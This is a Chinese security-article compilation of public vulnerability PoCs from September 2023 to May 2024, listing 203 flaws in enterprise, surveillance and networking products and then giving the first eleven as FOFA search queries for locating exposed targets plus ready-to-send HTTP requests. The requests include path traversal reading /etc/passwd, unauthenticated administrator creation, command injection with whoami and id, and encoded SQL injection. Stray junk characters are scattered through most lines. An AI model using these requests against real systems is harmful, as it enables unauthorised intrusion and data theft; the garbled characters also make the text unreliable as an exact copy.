互联网公开漏洞整理202309-202406& p1 M2 @; M5 o8 t
道一安全 2024-06-05 07:41 北京& ^. f4 B: \( e* T0 H: c2 T% v
以下文章来源于网络安全新视界 ,作者网络安全新视界
4 e& l$ W) H: V% C" z- ^9 s
- W( d9 P/ t9 Q0 `9 `+ `* t发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。$ o% X* f+ X3 a8 u
6 d( G4 z/ s1 @+ g
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。0 u5 M& u9 n6 C# |
4 _" E5 A8 A3 Y8 `, w {
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
; n7 `( ~. E2 M8 c+ t( ]& e/ R; P) R! |
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
. I9 a2 I8 e( }& ^' h5 i$ {7 Y6 Q9 x
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。3 P6 `- |& ]1 `% h$ R. a5 [
5 n# e2 _" K! L3 r$ E! K' n ?
, E( j, ]9 T+ G, l& W声明1 U+ s6 Y. F/ g+ X# A
* \7 v) V3 v9 C为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。6 X9 e" }) ?, L
0 l" L0 u/ N6 V& i1 c5 d
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
/ v6 P- T% A. n3 F* [* R! U8 a6 M3 M f/ I; S, ?
4 q3 }! V) y) Q2 b
$ c b4 Z3 j5 ~/ ^: s2 i1 B目录 ]4 @# }9 Y- w4 j, A
' K% E- l% w" ~) C$ W014 {" J5 D6 |9 M0 x9 l. o# \
' j4 z7 x2 K, b5 h0 j% f1. StarRocks MPP数据库未授权访问
3 p) Y) A0 S' I) E; d2 f2. Casdoor系统static任意文件读取
% G! q) l" [' f3. EasyCVR智能边缘网关 userlist 信息泄漏6 {1 ]" Y4 _) E$ g( w; `5 D$ @; H
4. EasyCVR视频管理平台存在任意用户添加$ U- V2 I5 [' l) s4 I* B
5. NUUO NVR 视频存储管理设备远程命令执行
4 T5 L0 D, `5 @7 O! N6. 深信服 NGAF 任意文件读取
: \& \* C$ d: l6 z7. 鸿运主动安全监控云平台任意文件下载- H3 D; U- d K9 Y0 }% |* I
8. 斐讯 Phicomm 路由器RCE" _; h5 A, S: \% s9 s3 A) n3 Y# J
9. 稻壳CMS keyword 未授权SQL注入+ u. k4 X' B+ }* b& h3 J+ w
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传' x; C5 d& e7 \, D& ^% d% l
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
$ ^" T! q" o; K# x" G$ P' T12. Jorani < 1.0.2 远程命令执行
8 {4 M$ o2 O+ L2 A2 x6 m, J8 z13. 红帆iOffice ioFileDown任意文件读取# i/ [9 L; b: b- [( L
14. 华夏ERP(jshERP)敏感信息泄露0 }0 o3 {1 I8 s4 ]( l& g
15. 华夏ERP getAllList信息泄露! a" m: w" G& h* m6 V9 C0 n
16. 红帆HFOffice医微云SQL注入
+ P, [4 ^" g- g' d5 S" R! ?17. 大华 DSS itcBulletin SQL 注入
7 k' K! F7 r, g4 X1 E18. 大华 DSS 数字监控系统 user_edit.action 信息泄露) e% B2 i1 F' C. w1 K. K
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入 A; o3 x% D/ C$ \& D* y) E2 C
20. 大华ICC智能物联综合管理平台任意文件读取
* p# }5 J1 C3 L) M% q* P1 v1 |9 N21. 大华ICC智能物联综合管理平台random远程代码执行
9 [9 c' `9 i& c) k, c+ E+ n9 n* Q22. 大华ICC智能物联综合管理平台 log4j远程代码执行
" Z( [. [( O* x. u( v& A23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
8 \/ [1 q) S* k5 C6 ~3 q24. 用友NC 6.5 accept.jsp任意文件上传 q' D# p. x0 ~9 _1 u0 p0 R
25. 用友NC registerServlet JNDI 远程代码执行; q2 S( Q1 C" I- Y, i4 R4 D9 {
26. 用友NC linkVoucher SQL注入4 L+ A7 x$ x2 f
27. 用友 NC showcontent SQL注入
6 d* C* D6 V9 ~; }# v9 ]+ Q28. 用友NC grouptemplet 任意文件上传
& U& a |9 i& H1 q7 i1 e+ d29. 用友NC down/bill SQL注入
; c1 i2 L) r* P! k }) M2 z30. 用友NC importPml SQL注入) Y3 [. l1 t' p( J& T* m/ E3 \9 ^
31. 用友NC runStateServlet SQL注入
7 W2 a) V- k+ M) e' D32. 用友NC complainbilldetail SQL注入
' W! _( Y7 U0 h- n( U$ D: L33. 用友NC downTax/download SQL注入4 a" h' i$ n# M9 W" b7 q& S; O
34. 用友NC warningDetailInfo接口SQL注入: Q ?5 i- U" O3 S5 }8 X
35. 用友NC-Cloud importhttpscer任意文件上传
: Z3 K) M3 s! a7 m36. 用友NC-Cloud soapFormat XXE
; P2 Y( Y' @5 S! I1 I9 v: Z37. 用友NC-Cloud IUpdateService XXE
: Q( V' l1 Y- }" b9 K38. 用友U8 Cloud smartweb2.RPC.d XXE( \. K7 E" l$ J) x# M7 M2 }
39. 用友U8 Cloud RegisterServlet SQL注入 s% M, m9 V( R2 |6 X' s9 E
40. 用友U8-Cloud XChangeServlet XXE
5 \; A* p* T) e4 n2 ^41. 用友U8 Cloud MeasureQueryByToolAction SQL注入' X6 {- B) o, F
42. 用友GRP-U8 SmartUpload01 文件上传' X5 d/ L$ n6 Y7 L
43. 用友GRP-U8 userInfoWeb SQL注入致RCE3 K% ]% _' d( H' `- ?3 C2 A
44. 用友GRP-U8 bx_dj_check.jsp SQL注入 A9 k. _7 k3 |+ P9 M
45. 用友GRP-U8 ufgovbank XXE
( L1 S- {7 k1 ?2 }: `) y46. 用友GRP-U8 sqcxIndex.jsp SQL注入
- i; b4 Y4 c# c6 O8 J. O$ f47. 用友GRP A++Cloud 政府财务云 任意文件读取
* F) E5 i8 `" ? }2 z \48. 用友U8 CRM swfupload 任意文件上传; H! j* P* [% r% K1 Z
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
- S5 A! u5 y4 ^7 h50. QDocs Smart School 6.4.1 filterRecords SQL注入- m8 u# y7 X) p( R- E
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
' m, j5 \% m" Z9 M! R1 p52. 泛微E-Office json_common.php sql注入+ ]) x" F; V6 ?) p8 ^5 t9 u
53. 迪普 DPTech VPN Service 任意文件上传
0 f- i- f: Z! z4 v. j* ^5 V54. 畅捷通T+ getstorewarehousebystore 远程代码执行. o# Z7 j1 ^$ M2 X$ b
55. 畅捷通T+ getdecallusers信息泄露" f7 w% P8 ]: S7 T+ n
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
* K. a' n" m7 @7 O8 G. P57. 畅捷通T+ keyEdit.aspx SQL注入
; i" K9 ^: I: e58. 畅捷通T+ KeyInfoList.aspx sql注入+ X$ z" Y, c, ?2 {$ t3 g
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
7 _ X1 w7 h' A e, f6 ?60. 百卓Smart管理平台 importexport.php SQL注入 v }9 a1 }# R
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
+ l, i7 [, R) D$ `62. IP-guard WebServer 远程命令执行
* [, K6 `/ i6 r2 Z) w63. IP-guard WebServer任意文件读取
- z' |! `7 o6 G6 \64. 捷诚管理信息系统CWSFinanceCommon SQL注入
& U( i' R( Z- ]( K65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过 P" \6 Z9 i- l$ b
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入+ {& @: I( T; R) i
67. 万户ezOFFICE wpsservlet任意文件上传
% o1 H2 P7 l8 H( M8 D1 j* ]6 r& U: H68. 万户ezOFFICE wf_printnum.jsp SQL注入
6 v" ^3 \: h" a# b9 a# q* x- E69. 万户 ezOFFICE contract_gd.jsp SQL注入/ D7 A8 A, \" D# T. P
70. 万户ezEIP success 命令执行, l9 q S$ P7 S5 w! n+ t" p) s
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
- P+ v/ u6 }8 L' T72. 致远OA getAjaxDataServlet XXE4 [0 ?- m* Q% H" c0 V I8 c
73. GeoServer wms远程代码执行" J) d8 e+ A* Q: D/ c6 L6 P
74. 致远M3-server 6_1sp1 反序列化RCE
n9 {0 T% R3 o7 j1 U4 [75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
( @0 R$ Q! W* s1 i) T" G76. 新开普掌上校园服务管理平台service.action远程命令执行
. c, I. V$ q/ C% f& C! K! j R77. F22服装管理软件系统UploadHandler.ashx任意文件上传" w D$ Y: g E; e
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
' p* x7 `) O0 K79. BYTEVALUE 百为流控路由器远程命令执行
% s! p0 f3 q& G9 Y- l- f) l80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传# r% I1 X s- R$ z& i A( h
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
3 b' x; r% T7 y. |$ ]82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
* d; z( n' ]4 o. P! ]83. JeecgBoot testConnection 远程命令执行
( v$ |8 L9 F+ i5 g4 S84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
" \& e! G4 e) ^: h9 w85. SysAid On-premise< 23.3.36远程代码执行
, n" q* e S. t Y. w% g86. 日本tosei自助洗衣机RCE( y% H$ V+ ?1 M! o) i) u
87. 安恒明御安全网关aaa_local_web_preview文件上传9 x: S; K' ~- A: _* Z T
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
) @ j0 H7 R+ n% @( l89. 致远互联FE协作办公平台editflow_manager存在sql注入
- Y% g' I( t, G3 b7 ?" a90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行3 F7 ~$ G7 Q" o/ d1 X4 ?
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取* z4 Q+ S V5 \ Y
92. 海康威视运行管理中心session命令执行
8 w6 q. Y; v& C93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传+ o( g$ z2 ^3 t: \, R
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传* Y: n4 m+ |: r. y
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
0 \+ v7 H6 c8 q% \96. Apache OFBiz 18.12.11 groovy 远程代码执行
" C; K) d6 \, E97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行* D" A8 T9 B6 v$ e8 D' D; P
98. SpiderFlow爬虫平台远程命令执行4 p) a: m7 T6 u9 ]- A
99. Ncast盈可视高清智能录播系统busiFacade RCE4 X; A* G0 B: Y6 F4 D. R0 m
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
6 U& L% ?7 }( w* Q101. ivanti policy secure-22.6命令注入
. M/ v1 r' }1 }1 n6 v4 A102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
: c4 Y# z2 |9 t$ t! N103. Ivanti Pulse Connect Secure VPN XXE
7 C) l8 o; V k+ [104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露& _( p3 v- c% T0 X; G$ R. i
105. SpringBlade v3.2.0 export-user SQL 注入+ z$ l: W- B. s2 d8 |* r
106. SpringBlade dict-biz/list SQL 注入
Q0 o$ s' } T# c* r& x107. SpringBlade tenant/list SQL 注入
- E: h n1 C( A E7 u0 M108. D-Tale 3.9.0 SSRF
5 c6 D1 B0 W1 l109. Jenkins CLI 任意文件读取
- h4 A5 I* J. R5 K# I110. Goanywhere MFT 未授权创建管理员3 L6 \3 L+ R8 u3 y4 s4 {2 }
111. WordPress Plugin HTML5 Video Player SQL注入
! d/ o e0 V8 y; E; x$ \" `2 y112. WordPress Plugin NotificationX SQL 注入; p% [1 c! z* O
113. WordPress Automatic 插件任意文件下载和SSRF
9 T% Z4 }9 q& c5 ]3 ~114. WordPress MasterStudy LMS插件 SQL注入
0 s" b( r( }7 g x& K$ V4 T: G115. WordPress Bricks Builder <= 1.9.6 RCE0 I# Q) a/ { s" W8 Q; r( f
116. wordpress js-support-ticket文件上传
: ^9 y- `& g2 |117. WordPress LayerSlider插件SQL注入& w) _, l# Y" M
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传+ x; X5 \" h7 _2 l
119. 北京百绰智能S20后台sysmanageajax.php sql注入4 O: T+ O1 K5 i) f1 f: W- u+ |7 d. I
120. 北京百绰智能S40管理平台导入web.php任意文件上传% n5 h n% I0 q0 B+ P3 H, {
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
( n; x, n8 s! Z- t122. 北京百绰智能s200管理平台/importexport.php sql注入
& D$ ^' x: ~- b: [123. Atlassian Confluence 模板注入代码执行
, F c$ n3 Z" d4 X. B1 M124. 湖南建研工程质量检测系统任意文件上传
* W J0 ]& |* |" g125. ConnectWise ScreenConnect身份验证绕过/ r1 s" A6 n8 f2 g0 v
126. Aiohttp 路径遍历7 Q& D& z5 u0 }! S
127. 广联达Linkworks DataExchange.ashx XXE7 h* t6 C6 F3 X: n
128. Adobe ColdFusion 反序列化
8 F3 p; z8 U; P: T129. Adobe ColdFusion 任意文件读取+ t) C9 e; U6 z, z" x
130. Laykefu客服系统任意文件上传
+ I2 J( L. O2 M' x$ C& ^131. Mini-Tmall <=20231017 SQL注入
1 L: Q' q1 z% G! V* v( R2 L# w132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
8 g0 y2 R& P' m4 ` A0 G2 w2 d133. H5 云商城 file.php 文件上传
) P- p2 E2 Q8 F6 I134. 网康NS-ASG应用安全网关index.php sql注入
) e( p* E# I: g6 V# m; T135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入5 w4 A6 n& F7 _$ J* x
136. NextChat cors SSRF
3 R% ~# }5 b2 \0 o( r137. 福建科立迅通信指挥调度平台down_file.php sql注入
6 L, L2 K) e, J/ \8 I# i138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
& R: a( D1 f/ x5 v$ ^, Z139. 福建科立讯通信指挥调度平台editemedia.php sql注入+ D! ?: y4 n* S2 k/ B5 L
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入+ z( I1 x8 @% L% K0 N4 I; b) M
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入" ?* A) d! _, ^' f7 \3 j% ^
142. CMSV6车辆监控平台系统中存在弱密码
( w. B) m. _6 q3 I: u143. Netis WF2780 v2.1.40144 远程命令执行
1 C; Y# a- V& _9 q5 j9 z144. D-Link nas_sharing.cgi 命令注入
' a, u) l) }: G# t; [145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
a1 V: u8 x" {. D; g( c3 ]# Y9 e146. MajorDoMo thumb.php 未授权远程代码执行
. r5 g* ~' m7 `147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
0 S, ]* `3 g3 |5 R4 p, Q3 N148. CrushFTP 认证绕过模板注入
, E5 b, _8 u- ^% }* I149. AJ-Report开源数据大屏存在远程命令执行- i7 n8 L, h$ t: m0 }7 O
150. AJ-Report 1.4.0 认证绕过与远程代码执行
1 n0 n$ K3 ]- X: @9 L151. AJ-Report 1.4.1 pageList sql注入1 N1 b# s4 B. q4 Y% e: v
152. Progress Kemp LoadMaster 远程命令执行* {& l+ Y' K# I
153. gradio任意文件读取
5 m! K, c4 G8 c- g: l154. 天维尔消防救援作战调度平台 SQL注入
% q( ^8 N! g4 i" K& e; {8 d) T0 A155. 六零导航页 file.php 任意文件上传
( u9 {6 G" ^5 z9 N9 g' T) C156. TBK DVR-4104/DVR-4216 操作系统命令注入
& F+ a6 n3 t$ k, c( z H, b* v9 D157. 美特CRM upload.jsp 任意文件上传3 U' ~- S/ K. }1 u$ n
158. Mura-CMS-processAsyncObject存在SQL注入
4 n" Z) n( T7 s3 L. j$ s3 A8 a159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
8 ] o. m5 T$ b* o) c6 ]; M160. Sonatype Nexus Repository 3目录遍历与文件读取4 L- c h! H& S4 G- F
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
6 O. c: G4 [; b0 r( N! A162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
a: W1 t5 q; l: ~5 [/ b3 H0 B163. 号卡极团分销管理系统 ue_serve.php 任意文件上传0 ]* s6 H) @( [" @& Q+ ~ q: U
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传- x/ q- `7 o- ?/ d% m/ K9 i
165. OrangeHRM 3.3.3 SQL 注入; V3 l- Y+ d% M* Y" C: ?, T
166. 中成科信票务管理平台SeatMapHandler SQL注入3 L! _- s' h% z; k0 M* r* U1 H
167. 精益价值管理系统 DownLoad.aspx任意文件读取
' R, _1 R# |. R9 `, o168. 宏景EHR OutputCode 任意文件读取0 o/ I( C; R4 i. B( i" j& Z
169. 宏景EHR downlawbase SQL注入' o! K7 v4 o4 E: g
170. 宏景EHR DisplayExcelCustomReport 任意文件读取" z# [- i4 M2 z* ~; j
171. 通天星CMSV6车载定位监控平台 SQL注入$ _3 I) Q; L2 K' Y
172. DT-高清车牌识别摄像机任意文件读取. H" w% a" d5 h! a w8 P: V
173. Check Point 安全网关任意文件读取/ D& b' d) j. M6 b& `
174. 金和OA C6 FileDownLoad.aspx 任意文件读取" b. N' J0 y: Z
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入8 d/ Q% ^* t, t1 N! s" y2 v: P; U9 ~
176. 电信网关配置管理系统 rewrite.php 文件上传
0 y, K$ { @7 u% u8 D177. H3C路由器敏感信息泄露5 C" u* f0 j* h! I; \& w
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
- f. X) E( A' z7 ?9 ?( B3 r179. 建文工程管理系统存在任意文件读取
3 g! g. y3 M! \- z5 L! N3 r9 R180. 帮管客 CRM jiliyu SQL注入
8 i& _% K& p! ^7 V2 B2 C! e8 f181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入7 U/ s3 P# \4 n9 x8 |( `9 K
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
* Q0 [' T" `/ E6 b9 W4 C183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
( L9 B: D" ~! I1 {184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加" g' s3 i8 l, V1 H) G6 j! c: U+ ?
185. 瑞友天翼应用虚拟化系统SQL注入7 D4 u5 A6 S1 G5 n8 w
186. F-logic DataCube3 SQL注入
3 {1 j. e% [ u8 G3 Y1 g187. Mura CMS processAsyncObject SQL注入
9 t5 `" v( W+ h" n7 J188. 叁体-佳会视频会议 attachment 任意文件读取& L( n. c1 ]% d
189. 蓝网科技临床浏览系统 deleteStudy SQL注入" J0 ~2 m3 W& r" v: s& y3 B7 d
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
. } o7 G; h: R0 u) J7 a1 z191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入. T( ?, f. O" {5 J( c
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
, u1 Z6 R% g4 V8 ~* J. { ]9 Y193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
8 Y( g: [4 i9 D" s7 B& o194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传% U; A) V, F/ I$ t( n" J
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
" Z3 ~" F% ]% d1 _ s196. 河南省风速科技统一认证平台密码重置& ]8 @# C: G4 ~3 H6 a) z
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
3 b- ]2 o3 M2 C( q0 W5 W' N6 e' H7 ^198. 阿里云盘 WebDAV 命令注入
0 R# m+ i( x( T199. cockpit系统assetsmanager_upload接口 文件上传
% K3 _( N. \7 u, Z5 S& `5 |200. SeaCMS海洋影视管理系统dmku SQL注入4 S5 b% B: o3 k" l* ~6 C- O+ l
201. 方正全媒体新闻采编系统 binary SQL注入. o/ f5 D# [1 H. i3 l
202. 微擎系统 AccountEdit任意文件上传
3 |% b$ z4 O1 Z, t% K203. 红海云EHR PtFjk 文件上传* A$ o( \% j7 H% z/ V. a" h4 s
8 ]0 F7 b/ ?# N2 rPOC列表0 ~; B9 R- W+ m' m
! `2 O9 C. Q R8 C02
4 s2 U4 _. I& O S* m% I
% l- H& z4 s" {5 p8 K1. StarRocks MPP数据库未授权访问0 a0 Y1 h. n; {3 N# q K0 `
FOFA :title="StarRocks", H7 C4 @( C8 s0 h5 [# R+ M
GET /mem_tracker HTTP/1.1" m. Y* }4 }3 z: w( a
Host: URL
1 D' C1 v4 r/ q% w) o, C# C7 B7 x2 d5 j9 n
# H- j/ s# n, O% f- L2. Casdoor系统static任意文件读取
# c" `! b: A! qFOFA :title="Casdoor"7 ^0 v! G ^5 Z: V9 S# [: f2 q
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1& ^4 h4 \2 l; i7 i' A* @ ^- G X
Host: xx.xx.xx.xx:99998 m0 l$ h; q% V7 I7 l* V, z+ U
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
2 }$ r: Q3 \: q7 Y4 a mConnection: close
; b' d& a% \3 K6 ~: N$ k: uAccept: */*% J$ A( r. v. y, {9 ^2 C
Accept-Language: en! G: R# D6 k% k1 `
Accept-Encoding: gzip. b4 A2 B7 A* E P
* O, j$ v/ V8 [: I0 `5 p
! i# h) l# P+ C# N$ ?. ]3. EasyCVR智能边缘网关 userlist 信息泄漏
" u, a1 t- w& j3 x* x9 O- \4 j( fFOFA :title="EasyCVR"
5 R$ x: A- i7 V7 ?7 }2 K7 PGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
, ]4 E( R3 `1 d' {Host: xx.xx.xx.xx
3 j0 B* }" Z; c% R/ m3 {& |$ k: |/ z6 w8 }( X$ A2 I& q
" h' r; s4 |# W4. EasyCVR视频管理平台存在任意用户添加
; Q9 I$ I, z d0 YFOFA :title="EasyCVR"
1 B4 @. t* d$ ]1 N1 A. w4 z
& _$ x9 @* l. t' I( k! W& wpassword更改为自己的密码md56 s* c5 h7 W9 s) s8 S1 u' o
POST /api/v1/adduser HTTP/1.1
$ I, h$ W8 ?# k# ^0 M& f& qHost: your-ip
8 p: W5 @& Y* X+ C2 ~% zContent-Type: application/x-www-form-urlencoded; charset=UTF-8
* n% d, R# o) B( E0 V0 {/ [8 p
% M% a" d% M7 K/ G! [$ `8 X- y, q$ Q# Fname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1* F4 j" j4 g8 A$ @# Z. d+ n
% m$ p2 m8 B, d6 l
% ^$ g+ g+ d, j" m5. NUUO NVR 视频存储管理设备远程命令执行
& G+ ?5 K9 Q8 ~5 k8 ?: OFOFA:title="Network Video Recorder Login"
- V; y( z3 T5 G# J, n6 tGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
. i' H& S2 d' w2 ~) q4 i1 hHost: xx.xx.xx.xx, ?$ z4 a# l* X2 k$ L, P
- F- }9 v/ Z0 g$ Z, O; q& R0 v
. T5 [+ ]/ y( S1 N6. 深信服 NGAF 任意文件读取
" g1 F, a r( P* pFOFA:title="SANGFOR | NGAF"
# f/ F) O: z0 U0 r+ ?) hGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
( w: q2 Q; b' K e0 \# P( KHost:
. r s1 V' i4 j4 [8 F4 b) f: i% E% N) V) n* x0 E& z
p( s) C5 m* G5 G4 u$ V1 \3 n
7. 鸿运主动安全监控云平台任意文件下载
8 N: |& M! a: V' G6 tFOFA:body="./open/webApi.html"
- {) c% X+ ]! Q/ OGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
% a ^; V3 M% U1 UHost:
4 N8 x+ w& z0 d1 d3 y6 ?7 b- O) D4 |" e% S9 U+ h& C, [
! J4 N* n8 R7 Q" w8. 斐讯 Phicomm 路由器RCE9 G6 R/ D* G/ H# W
FOFA:icon_hash="-1344736688"2 \' @9 }; T5 |( _& V
默认账号admin登录后台后,执行操作0 k- F0 d; L& d0 G% H k
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
: d' }5 f, s8 l: P, R; AHost: x.x.x.x
2 S$ {# F2 P' o1 LCookie: sysauth=第一步登录获取的cookie$ A/ p; o1 [( x2 z! G' @
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz' I. p' c$ ^2 k' W; H% p! P
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36. u- k4 b7 @% }8 b, h) a
5 J ?/ ]# e7 t* i------WebKitFormBoundaryxbgjoytz+ x& x# a/ b; l2 @
Content-Disposition: form-data; name="wifiRebootEnablestatus"% ~; _/ X/ g J# n3 y
/ r/ K( G# q1 R# T; S2 {0 v& s' k y: T: ^
%s
- ? Z( ^# c ?' j$ k3 J9 d0 t------WebKitFormBoundaryxbgjoytz
- J- ]/ N0 D$ I, o2 J7 ~) VContent-Disposition: form-data; name="wifiRebootrange", }9 I4 M9 o, |; J+ p
" d0 ?) A! z$ g
12:00; id;
3 W6 u' P2 O( B' L------WebKitFormBoundaryxbgjoytz3 R" W) g, l# S% K. f/ r# Z
Content-Disposition: form-data; name="wifiRebootendrange"
2 o5 S2 }$ j0 @ G; z( J$ O5 ^# h% g2 Q. p; L" Y7 E. Q$ X
%s:& M' S" q& d& l6 n
------WebKitFormBoundaryxbgjoytz5 N( p$ M' f1 w8 y ]2 l6 `! m! O
Content-Disposition: form-data; name="cururl2"
9 D( j" t& q4 F; V: F
& V7 I) T' ~; f; g; e
v9 z$ N, a8 Y------WebKitFormBoundaryxbgjoytz--
* F. O( o, _: A8 u" I1 W
0 [+ `, I7 E8 x, I$ A: S3 i+ S% [1 {9 l, M* `
9. 稻壳CMS keyword 未授权SQL注入
* x% o6 e `1 wFOFA:app="Doccms"8 w9 l7 Y' h- w# L9 D+ ^& c
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
% w3 }( a% P! z( K. |3 }& y! RHost: x.x.x.x
7 o! P2 H/ H5 W5 E! A. I1 m' l
/ W1 S- ]. q. W5 Z
5 d3 z/ k+ [. U. S. Hpayload为下列语句的二次Url编码
, r3 e- e0 j2 i1 p
- U2 v" n1 Z3 ~5 }/ i- S* {7 w. d' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
0 d. L% T! p: K7 l, R4 M$ w2 T1 N; M+ l$ y5 [. k' J! y! {
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
) x6 B! [8 K) z' T1 {/ `FOFA:icon_hash="953405444"
. n$ K# L3 g2 p; R1 b, ]7 m) _+ x# Q- T/ i. ?3 V( `: R. r
文件上传后响应中包含上传文件的路径9 c7 H+ z- y M8 t2 Q
POST /eis/service/api.aspx?action=saveImg HTTP/1.1- n+ ^- f) W. _0 ^" r
Host: x.x.x.x:xx
! {' A0 S \% W$ jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
8 P+ d7 v3 L6 D+ K$ V- P0 oContent-Length: 197
3 j m y" l" w& w+ VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.97 A( T. S& b" X) I
Accept-Encoding: gzip, deflate8 T6 f9 K( V j
Accept-Language: zh-CN,zh;q=0.93 {: C d) Q: \4 X$ }3 B' M: V
Connection: close
( S: [! Z& M5 p4 J7 H3 d2 hContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
: z/ [$ F9 l0 G
6 z! u4 M7 K& B# u6 k------WebKitFormBoundaryxdgaqmqu
f0 p& U6 p: z5 L" o" c1 @Content-Disposition: form-data; name="file"filename="icfitnya.txt"
( Z2 o8 x2 P' ^( W8 b3 PContent-Type: text/html
$ A/ B% {7 z- A+ k3 ~) n& Q$ Y& E& ~( k3 C. d: Q& |
jmnqjfdsupxgfidopeixbgsxbf
+ V( N8 B" l- K$ M% t8 h( L------WebKitFormBoundaryxdgaqmqu--4 F+ I: V g) f- S) }/ q
( Q6 L/ \: i& X4 _! P1 v
3 y- c# l& [3 T11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入& n K N! C2 l! \- w, R3 P
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
